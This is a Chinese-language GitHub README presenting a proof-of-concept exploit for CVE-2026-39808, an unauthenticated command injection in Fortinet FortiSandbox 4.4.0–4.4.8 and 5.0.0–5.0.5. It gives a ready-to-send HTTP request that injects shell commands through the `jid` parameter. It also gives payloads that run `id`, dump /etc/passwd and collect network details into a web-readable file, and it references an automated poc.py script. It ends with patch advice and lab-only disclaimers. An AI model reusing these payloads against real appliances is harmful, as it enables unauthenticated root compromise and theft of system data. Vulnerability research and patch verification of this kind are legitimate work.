0xBlackash/CVE-2026-39808

GitHub: 0xBlackash/CVE-2026-39808

针对 FortiSandbox 未授权命令注入导致的沙箱逃逸漏洞提供 PoC 验证与复现。

Stars: 0 | Forks: 0

# 🚨 FortiSandbox Root 沙箱逃逸 - CVE-2026-39808 1765359501378 Status CVE Affected Versions
## 🎯 概述 本仓库包含一个针对 **CVE-2026-39808** 的干净且有详细文档的 PoC(概念验证),这是一个 Fortinet FortiSandbox 中未经身份验证的命令注入漏洞,可导致 **沙箱逃逸** 并以 **root**(`uid=0`)身份执行远程代码。 ### 此 PoC 演示了以下内容: - 通过 `jid` 参数实现的路径遍历与命令注入 - 从分析环境突破沙箱 - 以 root 权限执行任意命令 - 读取系统文件与网络信息 ## 📸 演示 CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 2 **成功利用后显示 `uid=0 gid=0 groups=0`** ## 🚀 受影响的版本 | 版本范围 | 状态 | |------------------------|----------| | FortiSandbox 4.4.0 – 4.4.8 | 易受攻击 | | FortiSandbox 5.0.0 – 5.0.5 | 易受攻击 | | 4.4.9+ / 5.0.6+ | 已修复 | ## 🛠️ 使用方法(仅限实验室) ### 1. 简单载荷(推荐) ``` GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1 Host: your-lab-ip ``` ### 2. 查看结果 在浏览器中打开: ``` https://your-lab-ip/ng/out.txt ``` ### 3. 高级载荷示例 ``` # 获取 IP 地址 + 主机名 jid=|(hostname; ip -4 addr show > /web/ng/out.txt)| # 完整系统侦察 jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)| ``` ## 📁 仓库内容 - `poc.py` → 自动化 Python 漏洞利用脚本 - `burp-request.txt` → 可直接使用的 Burp Suite 请求 - `payloads.md` → 有用载荷集合 - `screenshots/` → 分步利用截图 - `README.md` → 本文件 ## ⚠️ 重要说明 - **仅限教育与实验室用途** - **不得在生产环境或未授权系统上使用** - 测试前务必获得明确许可 - 请将 FortiSandbox 更新至 **4.4.9+** 或 **5.0.6+** 版本 ## 🛡️ 缓解措施 立即将 FortiSandbox 更新至以下任一版本: - **4.4.9** 或更高版本 - **5.0.6** 或更高版本 Fortinet 已发布官方补丁修复此漏洞。
**仅供研究与学习用途** ⭐ 如果此仓库对您有帮助,请给予星标!
标签:APT, CISA项目, CSV导出, CVE-2026-39808, Fortinet, FortiSandbox, PoC, root, 云资产清单, 命令注入, 暴力破解, 未认证, 根逃逸, 沙箱逃逸, 漏洞复现, 编程工具, 网络安全审计, 网络攻防, 路径遍历, 远程代码执行, 逆向工具, 逆向工程